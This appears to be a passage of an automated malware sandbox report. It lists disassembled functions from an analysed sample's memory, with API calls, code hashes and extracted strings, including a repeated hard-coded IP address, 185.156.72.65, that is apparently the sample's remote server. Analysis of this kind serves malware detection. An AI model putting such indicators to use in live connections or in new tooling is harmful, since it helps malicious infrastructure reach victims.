                      • Instruction ID: a45ec91265a130491ca744ceba9d666514f598402c535a81d2d6f777d8ba8db7
                      • Opcode Fuzzy Hash: daefbb992f6e98e82da9deec0440fc20cde4ea8490cf1120197b10a32be04fa6
                      • Instruction Fuzzy Hash: E8219375A04205AFEB20EF65DC81E7B77AEAF842687204935FD1A97170E774FC4287A0
                      Function 0041121B Relevance: 6.1, APIs: 4, Instructions: 79COMMON
                      Download Yara Rule
                      Memory Dump Source
                      • Source File: 00000000.00000002.4452266147.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_400000_file.jbxd
                      Yara matches
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: daefbb992f6e98e82da9deec0440fc20cde4ea8490cf1120197b10a32be04fa6
                      • Instruction ID: 7177a7605b41648a86b30584ce86508c4f97125f369475c71d892394931dc7de
                      • Opcode Fuzzy Hash: daefbb992f6e98e82da9deec0440fc20cde4ea8490cf1120197b10a32be04fa6
                      • Instruction Fuzzy Hash: CF21CC31600205AFDF20AF62CC40DEB776DAF54368B10456FFA15E76A1D738DC818768
                      Function 049535E0 Relevance: 6.1, APIs: 4, Instructions: 74COMMONLIBRARYCODE
                      Download Yara Rule
                      APIs
                      • FreeLibrary.KERNEL32(00000000,?,049536EF,0494381E,?,00000000,04942AA0,04942AA2,?,04953868,00000022,00420B0C,00422950,00422958,04942AA0), ref: 049536A1
                      Memory Dump Source
                      • Source File: 00000000.00000002.4453807873.0000000004940000.00000040.00001000.00020000.00000000.sdmp, Offset: 04940000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_4940000_file.jbxd
                      Yara matches
                      Similarity
                      • API ID: FreeLibrary
                      • String ID:
                      • API String ID: 3664257935-0
                      • Opcode ID: b8c7e483e8ea991eea5b44eb111e182d5bd336103010429673e37ca0c8998616
                      • Instruction ID: dc75c547a42f12a9f289368585f08454ecf7689698170e341f7030a169091c8b
                      • Opcode Fuzzy Hash: b8c7e483e8ea991eea5b44eb111e182d5bd336103010429673e37ca0c8998616
                      • Instruction Fuzzy Hash: F821C331A02611ABC731DB65EC42A5A7BA99B427E0B254238ED06A73B1DB30FD05C794
                      Function 049586EC Relevance: 6.1, APIs: 4, Instructions: 74COMMON
                      Download Yara Rule
                      APIs
                      • GetEnvironmentStringsW.KERNEL32 ref: 049586F4
                        • Part of subcall function 049551FF: WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000000,?,-00000008,?,00000000,-00000008,-00000008,00000000,?,04955462,?,00000000,-00000008), ref: 04955260
                      • FreeEnvironmentStringsW.KERNEL32(00000000), ref: 0495872C
                      • FreeEnvironmentStringsW.KERNEL32(00000000), ref: 0495874C
                      Memory Dump Source
                      • Source File: 00000000.00000002.4453807873.0000000004940000.00000040.00001000.00020000.00000000.sdmp, Offset: 04940000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_4940000_file.jbxd
                      Yara matches
                      Similarity
                      • API ID: EnvironmentStrings$Free$ByteCharMultiWide
                      • String ID:
                      • API String ID: 158306478-0
                      • Opcode ID: f25717e6bd25f80c70edce058ac37b14eb42a5c51d25e47d03568e648881f521
                      • Instruction ID: da794a8fd2d3a790ccbef012f21260be0a07f8a954a768ae26b22ec8f6b15c65
                      • Opcode Fuzzy Hash: f25717e6bd25f80c70edce058ac37b14eb42a5c51d25e47d03568e648881f521
                      • Instruction Fuzzy Hash: 03118EB66015197EA721FB765C88CAF2EADCEC91A87210534FD06A1120FA60FE1287B5
                      Function 00418485 Relevance: 6.1, APIs: 4, Instructions: 74COMMON
                      Download Yara Rule
                      APIs
                      • GetEnvironmentStringsW.KERNEL32 ref: 0041848D
                        • Part of subcall function 00414F98: WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000000,?,-00000008,?,00000000,-00000008,-00000008,00000000,?,004151FB,?,00000000,-00000008), ref: 00414FF9
                      • FreeEnvironmentStringsW.KERNEL32(00000000), ref: 004184C5
                      • FreeEnvironmentStringsW.KERNEL32(00000000), ref: 004184E5
                      Memory Dump Source
                      • Source File: 00000000.00000002.4452266147.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_400000_file.jbxd
                      Yara matches
                      Similarity
                      • API ID: EnvironmentStrings$Free$ByteCharMultiWide
                      • String ID:
                      • API String ID: 158306478-0
                      • Opcode ID: f25717e6bd25f80c70edce058ac37b14eb42a5c51d25e47d03568e648881f521
                      • Instruction ID: 3124dd8456e489f230558b3eb58c4822848d10064887246f2ffea9b448aa8e9c
                      • Opcode Fuzzy Hash: f25717e6bd25f80c70edce058ac37b14eb42a5c51d25e47d03568e648881f521
                      • Instruction Fuzzy Hash: 6311C8B6511515BEA7112BB69C8ACEF7A5EDF89398711002EF50191201FE7CDF82417E
                      Function 0495CE8F Relevance: 6.0, APIs: 4, Instructions: 29COMMONLIBRARYCODE
                      Download Yara Rule
                      APIs
                      • WriteConsoleW.KERNEL32(00000000,00000000,?,00000000,00000000,?,0495CB06,00000000,00000001,?,00000000,?,04959D25,00000000,00000000,00000000), ref: 0495CEA6
                      • GetLastError.KERNEL32(?,0495CB06,00000000,00000001,?,00000000,?,04959D25,00000000,00000000,00000000,00000000,00000000,?,0495A2C8,?), ref: 0495CEB2
                        • Part of subcall function 0495CE78: CloseHandle.KERNEL32(0042CA30,0495CEC2,?,0495CB06,00000000,00000001,?,00000000,?,04959D25,00000000,00000000,00000000,00000000,00000000), ref: 0495CE88
                      • ___initconout.LIBCMT ref: 0495CEC2
                        • Part of subcall function 0495CE3A: CreateFileW.KERNEL32(00428728,40000000,00000003,00000000,00000003,00000000,00000000,0495CE69,0495CAF3,00000000,?,04959D25,00000000,00000000,00000000,00000000), ref: 0495CE4D
                      • WriteConsoleW.KERNEL32(00000000,00000000,?,00000000,?,0495CB06,00000000,00000001,?,00000000,?,04959D25,00000000,00000000,00000000,00000000), ref: 0495CED7
                      Memory Dump Source
                      • Source File: 00000000.00000002.4453807873.0000000004940000.00000040.00001000.00020000.00000000.sdmp, Offset: 04940000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_4940000_file.jbxd
                      Yara matches
                      Similarity
                      • API ID: ConsoleWrite$CloseCreateErrorFileHandleLast___initconout
                      • String ID:
                      • API String ID: 2744216297-0
                      • Opcode ID: e3757025193b1f655bc0a77c3c1a7d52d6e2513ac00293883d9defc3f3400d05
                      • Instruction ID: 89c4c1b7f98522a9b69b08b15cfafe70a43135fa4217921e32848bd1af09b4f5
                      • Opcode Fuzzy Hash: e3757025193b1f655bc0a77c3c1a7d52d6e2513ac00293883d9defc3f3400d05
                      • Instruction Fuzzy Hash: B8F0303A540258BBCF229FD5EC08ACE3F26FF486A1B518030FE1996130D732AC259BD4
                      Function 0041CC28 Relevance: 6.0, APIs: 4, Instructions: 29COMMONLIBRARYCODE
                      Download Yara Rule
                      APIs
                      • WriteConsoleW.KERNEL32(00000000,00000000,?,00000000,00000000,?,0041C89F,00000000,00000001,?,00000000,?,00419ABE,00000000,00000000,00000000), ref: 0041CC3F
                      • GetLastError.KERNEL32(?,0041C89F,00000000,00000001,?,00000000,?,00419ABE,00000000,00000000,00000000,00000000,00000000,?,0041A061,?), ref: 0041CC4B
                        • Part of subcall function 0041CC11: CloseHandle.KERNEL32(FFFFFFFE,0041CC5B,?,0041C89F,00000000,00000001,?,00000000,?,00419ABE,00000000,00000000,00000000,00000000,00000000), ref: 0041CC21
                      • ___initconout.LIBCMT ref: 0041CC5B
                        • Part of subcall function 0041CBD3: CreateFileW.KERNEL32(CONOUT$,40000000,00000003,00000000,00000003,00000000,00000000,0041CC02,0041C88C,00000000,?,00419ABE,00000000,00000000,00000000,00000000), ref: 0041CBE6
                      • WriteConsoleW.KERNEL32(00000000,00000000,?,00000000,?,0041C89F,00000000,00000001,?,00000000,?,00419ABE,00000000,00000000,00000000,00000000), ref: 0041CC70
                      Memory Dump Source
                      • Source File: 00000000.00000002.4452266147.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_400000_file.jbxd
                      Yara matches
                      Similarity
                      • API ID: ConsoleWrite$CloseCreateErrorFileHandleLast___initconout
                      • String ID:
                      • API String ID: 2744216297-0
                      • Opcode ID: e3757025193b1f655bc0a77c3c1a7d52d6e2513ac00293883d9defc3f3400d05
                      • Instruction ID: 7cbbc293f9202e5c3ba5059a923030a343761d0fd9452bc47cab7a7a002841ff
                      • Opcode Fuzzy Hash: e3757025193b1f655bc0a77c3c1a7d52d6e2513ac00293883d9defc3f3400d05
                      • Instruction Fuzzy Hash: 34F03036580218BBCF221FD5EC45ADE3F26FF497A0B404031FA0D96131D6328C619BD8
                      Function 00409D4D Relevance: 6.0, APIs: 4, Instructions: 25COMMON
                      Download Yara Rule
                      APIs
                      • SleepConditionVariableCS.KERNELBASE(?,00409CEA,00000064), ref: 00409D70
                      • LeaveCriticalSection.KERNEL32(0042D064,0040104A,?,00409CEA,00000064,?,?,?,0040104A,0042DBF4), ref: 00409D7A
                      • WaitForSingleObjectEx.KERNEL32(0040104A,00000000,?,00409CEA,00000064,?,?,?,0040104A,0042DBF4), ref: 00409D8B
                      • EnterCriticalSection.KERNEL32(0042D064,?,00409CEA,00000064,?,?,?,0040104A,0042DBF4), ref: 00409D92
                      Memory Dump Source
                      • Source File: 00000000.00000002.4452266147.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_400000_file.jbxd
                      Yara matches
                      Similarity
                      • API ID: CriticalSection$ConditionEnterLeaveObjectSingleSleepVariableWait
                      • String ID:
                      • API String ID: 3269011525-0
                      • Opcode ID: 203c7f3a807ec8057ea0aa5072313220b9e23051332dfe18f360eb7747514d6b
                      • Instruction ID: ff8beb748e1eb1f5c5e1e2cf8612c53580035ff8934018e5237f3a6b450dea6c
                      • Opcode Fuzzy Hash: 203c7f3a807ec8057ea0aa5072313220b9e23051332dfe18f360eb7747514d6b
                      • Instruction Fuzzy Hash: 99E0ED31A85624FBCB111B60FC09AD97F25AF09B59F508032F90576171C7755D039BDD
                      Function 00410F1D Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 194COMMON
                      Download Yara Rule
                      APIs
                      • __startOneArgErrorHandling.LIBCMT ref: 00410FAD
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.4452266147.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_400000_file.jbxd
                      Yara matches
                      Similarity
                      • API ID: ErrorHandling__start
                      • String ID: pow
                      • API String ID: 3213639722-2276729525
                      • Opcode ID: 31403c08627a7049c2df153d0248aecbd7cedb7773a1804d7f4783afb4547b5b
                      • Instruction ID: 84ba177bd0b46390de2483f8fdd39171a32ac8a21a9604072373650434c829d0
                      • Opcode Fuzzy Hash: 31403c08627a7049c2df153d0248aecbd7cedb7773a1804d7f4783afb4547b5b
                      • Instruction Fuzzy Hash: 96515B71A0820196CB217B14DA023EB6BA0DB40751F618E6FF095453E8DBBDCCD7DA4E
                      Function 004095D0 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 183COMMON
                      Download Yara Rule
                      APIs
                      • Concurrency::cancel_current_task.LIBCPMT ref: 0040970E
                      • std::_Xinvalid_argument.LIBCPMT ref: 00409725
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.4452266147.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_400000_file.jbxd
                      Yara matches
                      Similarity
                      • API ID: Concurrency::cancel_current_taskXinvalid_argumentstd::_
                      • String ID: vector too long
                      • API String ID: 3646673767-2873823879
                      • Opcode ID: fa5d083a05728e905f1c3c49002d69253fe8fe1330e477015a8c99b2aef7f032
                      • Instruction ID: 3420b24d6a7003b5252f74598cccc6f366c2f3b22bc1f833b28caab4f548f479
                      • Opcode Fuzzy Hash: fa5d083a05728e905f1c3c49002d69253fe8fe1330e477015a8c99b2aef7f032
                      • Instruction Fuzzy Hash: B05104B2E002159BCB14DF6CD8406AEB7A5EF84314F14067EE805FB382EB75AE408BD5
                      Function 049420B7 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 154COMMON
                      Download Yara Rule
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.4453807873.0000000004940000.00000040.00001000.00020000.00000000.sdmp, Offset: 04940000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_4940000_file.jbxd
                      Yara matches
                      Similarity
                      • API ID:
                      • String ID: http://
                      • API String ID: 0-1121587658
                      • Opcode ID: 31913df3476a4e36ea7eb6e4b830b689be3485bdda04cc83fff487d743600f56
                      • Instruction ID: 6bac89f4c7e33a04f657778c2992a3de6e6d48541dc9823201a7925d004e0823
                      • Opcode Fuzzy Hash: 31913df3476a4e36ea7eb6e4b830b689be3485bdda04cc83fff487d743600f56
                      • Instruction Fuzzy Hash: 71518071D002099FEB18CFE8C894FEEB7B9FB88304F508569E515A7680D775A545CBA0
                      Function 0494BA67 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 120COMMON
                      Download Yara Rule
                      APIs
                      • ___except_validate_context_record.LIBVCRUNTIME ref: 0494BAA6
                      • __IsNonwritableInCurrentImage.LIBCMT ref: 0494BB5A
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.4453807873.0000000004940000.00000040.00001000.00020000.00000000.sdmp, Offset: 04940000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_4940000_file.jbxd
                      Yara matches
                      Similarity
                      • API ID: CurrentImageNonwritable___except_validate_context_record
                      • String ID: csm
                      • API String ID: 3480331319-1018135373
                      • Opcode ID: 2a817a1480194b9b32cfb7907dea545d9bb946fea234306998335fac64bc32e7
                      • Instruction ID: f8fd4814fa1228670a746e36af1c5dbbd4f4a5f8c078400c8c653d4389a200f2
                      • Opcode Fuzzy Hash: 2a817a1480194b9b32cfb7907dea545d9bb946fea234306998335fac64bc32e7
                      • Instruction Fuzzy Hash: 1941A130A00219AFDF10DF69C884EAEBBF5AF85328F148575E8146B3A5D731FA15CB90
                      Function 0494C307 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 112COMMONLIBRARYCODE
                      Download Yara Rule
                      APIs
                      • RtlEncodePointer.NTDLL(00000000), ref: 0494C32C
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.4453807873.0000000004940000.00000040.00001000.00020000.00000000.sdmp, Offset: 04940000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_4940000_file.jbxd
                      Yara matches
                      Similarity
                      • API ID: EncodePointer
                      • String ID: MOC$RCC
                      • API String ID: 2118026453-2084237596
                      • Opcode ID: dec2c1a8c1fc86745a31a1a2a9fa5c906894c1295ee00ff621ec7b5f648f62df
                      • Instruction ID: c4ba9752dcd84c22c44dd6542354d8036f89c1105082fda42e1d9e8fd5a27bc6
                      • Opcode Fuzzy Hash: dec2c1a8c1fc86745a31a1a2a9fa5c906894c1295ee00ff621ec7b5f648f62df
                      • Instruction Fuzzy Hash: B1414872901209AFDF16CF98C980EEEBBB9BF88304F158169F914A7225D735A950DF50
                      Function 0040C0A0 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 112COMMONLIBRARYCODE
                      Download Yara Rule
                      APIs
                      • EncodePointer.KERNEL32(00000000,?,00000000,1FFFFFFF), ref: 0040C0C5
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.4452266147.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_400000_file.jbxd
                      Yara matches
                      Similarity
                      • API ID: EncodePointer
                      • String ID: MOC$RCC
                      • API String ID: 2118026453-2084237596
                      • Opcode ID: dec2c1a8c1fc86745a31a1a2a9fa5c906894c1295ee00ff621ec7b5f648f62df
                      • Instruction ID: 8859d5309be3b2406ffac81c3508a23779d2d647c67c70ddfd5e45ce13346e89
                      • Opcode Fuzzy Hash: dec2c1a8c1fc86745a31a1a2a9fa5c906894c1295ee00ff621ec7b5f648f62df
                      • Instruction Fuzzy Hash: 89415A72900209EFCF15DF94CD81AAEBBB5BF48304F18816AF905BA292D3399951DF58
                      Function 04941487 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 62COMMON
                      Download Yara Rule
                      APIs
                        • Part of subcall function 04949F2C: RtlEnterCriticalSection.NTDLL(0042D064), ref: 04949F37
                        • Part of subcall function 04949F2C: RtlLeaveCriticalSection.NTDLL(0042D064), ref: 04949F74
                      • __Init_thread_footer.LIBCMT ref: 0494150B
                        • Part of subcall function 04949EE2: RtlEnterCriticalSection.NTDLL(0042D064), ref: 04949EEC
                        • Part of subcall function 04949EE2: RtlLeaveCriticalSection.NTDLL(0042D064), ref: 04949F1F
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.4453807873.0000000004940000.00000040.00001000.00020000.00000000.sdmp, Offset: 04940000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_4940000_file.jbxd
                      Yara matches
                      Similarity
                      • API ID: CriticalSection$EnterLeave$Init_thread_footer
                      • String ID: 185.156.72.65$185.156.72.65
                      • API String ID: 4132704954-2656946096
                      • Opcode ID: be6c719825c284f158df54f744c121145a8f163f6f071af473cd966bd4c0dd79
                      • Instruction ID: 98aa35c248c7357362b975aeb6d892297c345811a15bf566927ec248ad7140a2
                      • Opcode Fuzzy Hash: be6c719825c284f158df54f744c121145a8f163f6f071af473cd966bd4c0dd79
                      • Instruction Fuzzy Hash: 132126B0F002059EDB24EFB8E919BA97BB0FF85308F9041B9C4139B2A1D7757545CB59
                      Function 04941267 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 62COMMON
                      Download Yara Rule
                      APIs
                        • Part of subcall function 04949F2C: RtlEnterCriticalSection.NTDLL(0042D064), ref: 04949F37
                        • Part of subcall function 04949F2C: RtlLeaveCriticalSection.NTDLL(0042D064), ref: 04949F74
                      • __Init_thread_footer.LIBCMT ref: 049412EB
                        • Part of subcall function 04949EE2: RtlEnterCriticalSection.NTDLL(0042D064), ref: 04949EEC
                        • Part of subcall function 04949EE2: RtlLeaveCriticalSection.NTDLL(0042D064), ref: 04949F1F
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.4453807873.0000000004940000.00000040.00001000.00020000.00000000.sdmp, Offset: 04940000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_4940000_file.jbxd
                      Yara matches
                      Similarity
                      • API ID: CriticalSection$EnterLeave$Init_thread_footer
                      • String ID: 185.156.72.65$185.156.72.65
                      • API String ID: 4132704954-2656946096
                      • Opcode ID: 7e78777c7f8c15a49dcdc04fede0bd4176c739fbcff90974db9594e6dc6bcbe4
                      • Instruction ID: 3d756ea9ba8b64fd540d48becca53452bae07eee396b8f7b50ee9fca1bafdc03
                      • Opcode Fuzzy Hash: 7e78777c7f8c15a49dcdc04fede0bd4176c739fbcff90974db9594e6dc6bcbe4
                      • Instruction Fuzzy Hash: 69216BB0F002459EDB14EFB8E919FA97BB0FB81308F9001B9E44567350D7B56589CB5D
                      Function 04941377 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 62COMMON
                      Download Yara Rule
                      APIs
                        • Part of subcall function 04949F2C: RtlEnterCriticalSection.NTDLL(0042D064), ref: 04949F37
                        • Part of subcall function 04949F2C: RtlLeaveCriticalSection.NTDLL(0042D064), ref: 04949F74
                      • __Init_thread_footer.LIBCMT ref: 049413FB
                        • Part of subcall function 04949EE2: RtlEnterCriticalSection.NTDLL(0042D064), ref: 04949EEC
                        • Part of subcall function 04949EE2: RtlLeaveCriticalSection.NTDLL(0042D064), ref: 04949F1F
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.4453807873.0000000004940000.00000040.00001000.00020000.00000000.sdmp, Offset: 04940000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_4940000_file.jbxd
                      Yara matches
                      Similarity
                      • API ID: CriticalSection$EnterLeave$Init_thread_footer
                      • String ID: 185.156.72.65$185.156.72.65
                      • API String ID: 4132704954-2656946096
                      • Opcode ID: 8a8fe8d317b662227fd327a90130799ce29107c4e0518a32c3058f42c24412ec
                      • Instruction ID: 39467b310fd79930c8b0e99fb2bed8e03df8f1992097a7dfc7e1b35ffb2f80bf
                      • Opcode Fuzzy Hash: 8a8fe8d317b662227fd327a90130799ce29107c4e0518a32c3058f42c24412ec
                      • Instruction Fuzzy Hash: 722129B0F002449EDB24EFB4E929BA97BB0FF81308F9001B9D80557251D7B57585CB59
                      Function 00401000 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 62COMMON
                      Download Yara Rule
                      APIs
                        • Part of subcall function 00409CC5: EnterCriticalSection.KERNEL32(0042D064,?,?,?,0040104A,0042DBF4), ref: 00409CD0
                        • Part of subcall function 00409CC5: LeaveCriticalSection.KERNEL32(0042D064,?,?,?,0040104A,0042DBF4), ref: 00409D0D
                      • __Init_thread_footer.LIBCMT ref: 00401084
                        • Part of subcall function 00409C7B: EnterCriticalSection.KERNEL32(0042D064,?,?,00401089,0042DBF4,0041DCC0), ref: 00409C85
                        • Part of subcall function 00409C7B: LeaveCriticalSection.KERNEL32(0042D064,?,?,00401089,0042DBF4,0041DCC0), ref: 00409CB8
                        • Part of subcall function 00409C7B: RtlWakeAllConditionVariable.NTDLL ref: 00409D2F
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.4452266147.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_400000_file.jbxd
                      Yara matches
                      Similarity
                      • API ID: CriticalSection$EnterLeave$ConditionInit_thread_footerVariableWake
                      • String ID: 185.156.72.65$185.156.72.65
                      • API String ID: 2296764815-2656946096
                      • Opcode ID: 5c5045922954c3457701567e6a6c9e3e1ad7be9ff9027362e03c1bac20b5626a
                      • Instruction ID: 35b52d446d861aa170816ff75a143a42135cfe1fbea8b7bbecd3f4fad1973d83
                      • Opcode Fuzzy Hash: 5c5045922954c3457701567e6a6c9e3e1ad7be9ff9027362e03c1bac20b5626a
                      • Instruction Fuzzy Hash: E32137B0F002859EDB14EFA4D9557A97BB0EB01308F90017EE4457B3A2D7B85985CB5D
                      Function 00401110 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 62COMMON
                      Download Yara Rule
                      APIs
                        • Part of subcall function 00409CC5: EnterCriticalSection.KERNEL32(0042D064,?,?,?,0040104A,0042DBF4), ref: 00409CD0
                        • Part of subcall function 00409CC5: LeaveCriticalSection.KERNEL32(0042D064,?,?,?,0040104A,0042DBF4), ref: 00409D0D
                      • __Init_thread_footer.LIBCMT ref: 00401194
                        • Part of subcall function 00409C7B: EnterCriticalSection.KERNEL32(0042D064,?,?,00401089,0042DBF4,0041DCC0), ref: 00409C85
                        • Part of subcall function 00409C7B: LeaveCriticalSection.KERNEL32(0042D064,?,?,00401089,0042DBF4,0041DCC0), ref: 00409CB8
                        • Part of subcall function 00409C7B: RtlWakeAllConditionVariable.NTDLL ref: 00409D2F
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.4452266147.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_400000_file.jbxd
                      Yara matches
                      Similarity
                      • API ID: CriticalSection$EnterLeave$ConditionInit_thread_footerVariableWake
                      • String ID: 185.156.72.65$185.156.72.65
                      • API String ID: 2296764815-2656946096
                      • Opcode ID: d4edda98fe8d358c67ce7c8865cf0bbf8e120b8e7e0123c9594653d9c3c5ac19
                      • Instruction ID: 080c8299786e9307901dd30be4a7bf730519a23c54167f024b5206933e891779
                      • Opcode Fuzzy Hash: d4edda98fe8d358c67ce7c8865cf0bbf8e120b8e7e0123c9594653d9c3c5ac19
                      • Instruction Fuzzy Hash: 5E217CB0F002409ACB24EFA4E8257A97BB0FF04308F50027EE5056B3D2D7B82945CB5D
                      Function 00401220 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 62COMMON
                      Download Yara Rule
                      APIs
                        • Part of subcall function 00409CC5: EnterCriticalSection.KERNEL32(0042D064,?,?,?,0040104A,0042DBF4), ref: 00409CD0
                        • Part of subcall function 00409CC5: LeaveCriticalSection.KERNEL32(0042D064,?,?,?,0040104A,0042DBF4), ref: 00409D0D
                      • __Init_thread_footer.LIBCMT ref: 004012A4
                        • Part of subcall function 00409C7B: EnterCriticalSection.KERNEL32(0042D064,?,?,00401089,0042DBF4,0041DCC0), ref: 00409C85
                        • Part of subcall function 00409C7B: LeaveCriticalSection.KERNEL32(0042D064,?,?,00401089,0042DBF4,0041DCC0), ref: 00409CB8
                        • Part of subcall function 00409C7B: RtlWakeAllConditionVariable.NTDLL ref: 00409D2F
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.4452266147.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_400000_file.jbxd
                      Yara matches
                      Similarity
                      • API ID: CriticalSection$EnterLeave$ConditionInit_thread_footerVariableWake
                      • String ID: 185.156.72.65$185.156.72.65
                      • API String ID: 2296764815-2656946096
                      • Opcode ID: 03769d53c3af616b68b676de3282a5896e4960c6caaa03750b9c6d119f5d353c
                      • Instruction ID: f3bdde1b4a8bc64e2f46b2d629ea0fd90e9d23492dc14d44f4e24dc008f4330a
                      • Opcode Fuzzy Hash: 03769d53c3af616b68b676de3282a5896e4960c6caaa03750b9c6d119f5d353c
                      • Instruction Fuzzy Hash: BA212274F002459ADB14FFA8E8157A97BB0BB00308F9041BED512BB2E2D7786901CB5D
                      Function 049486E7 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 36COMMON
                      Download Yara Rule
                      APIs
                        • Part of subcall function 04949F2C: RtlEnterCriticalSection.NTDLL(0042D064), ref: 04949F37
                        • Part of subcall function 04949F2C: RtlLeaveCriticalSection.NTDLL(0042D064), ref: 04949F74
                      • __Init_thread_footer.LIBCMT ref: 04948755
                        • Part of subcall function 04949EE2: RtlEnterCriticalSection.NTDLL(0042D064), ref: 04949EEC
                        • Part of subcall function 04949EE2: RtlLeaveCriticalSection.NTDLL(0042D064), ref: 04949F1F
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.4453807873.0000000004940000.00000040.00001000.00020000.00000000.sdmp, Offset: 04940000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_4940000_file.jbxd
                      Yara matches
                      Similarity
                      • API ID: CriticalSection$EnterLeave$Init_thread_footer
                      • String ID: G@ZK$[@G_
                      • API String ID: 4132704954-2338778587
                      • Opcode ID: c5541afd9278791e683032a0605f61e379c7bee72b326041da17bc8a9c68a871
                      • Instruction ID: ced717938db960ffb86bfc66e2cb81337620bd3240a0c6bb8509d39509613d49
                      • Opcode Fuzzy Hash: c5541afd9278791e683032a0605f61e379c7bee72b326041da17bc8a9c68a871
                      • Instruction Fuzzy Hash: 210126B0F00244DFCB10EFB8EC40D6AB7A0A799310BA04179D536AB290DB35B8018B05
                      Function 049480E7 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 36COMMON
                      Download Yara Rule
                      APIs
                        • Part of subcall function 04949F2C: RtlEnterCriticalSection.NTDLL(0042D064), ref: 04949F37
                        • Part of subcall function 04949F2C: RtlLeaveCriticalSection.NTDLL(0042D064), ref: 04949F74
                      • __Init_thread_footer.LIBCMT ref: 04948155
                        • Part of subcall function 04949EE2: RtlEnterCriticalSection.NTDLL(0042D064), ref: 04949EEC
                        • Part of subcall function 04949EE2: RtlLeaveCriticalSection.NTDLL(0042D064), ref: 04949F1F
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.4453807873.0000000004940000.00000040.00001000.00020000.00000000.sdmp, Offset: 04940000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_4940000_file.jbxd
                      Yara matches
                      Similarity
                      • API ID: CriticalSection$EnterLeave$Init_thread_footer
                      • String ID: G@ZK$[@G_
                      • API String ID: 4132704954-2338778587
                      • Opcode ID: 3643e019afddb0ded186ab5a90822b7330a81e91dcde7fa05791cd6361697cb6
                      • Instruction ID: a76d8c0da3bd43c517cb6c8633e47b6ba9047f3d1c89867115d964fd2ba21ff6
                      • Opcode Fuzzy Hash: 3643e019afddb0ded186ab5a90822b7330a81e91dcde7fa05791cd6361697cb6
                      • Instruction Fuzzy Hash: D40126F0F41204DBD720EFB8EC40E6AB7B0AB89300FA005BAE41957360DB3568418B05
                      Function 00408480 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 36COMMON
                      Download Yara Rule
                      APIs
                        • Part of subcall function 00409CC5: EnterCriticalSection.KERNEL32(0042D064,?,?,?,0040104A,0042DBF4), ref: 00409CD0
                        • Part of subcall function 00409CC5: LeaveCriticalSection.KERNEL32(0042D064,?,?,?,0040104A,0042DBF4), ref: 00409D0D
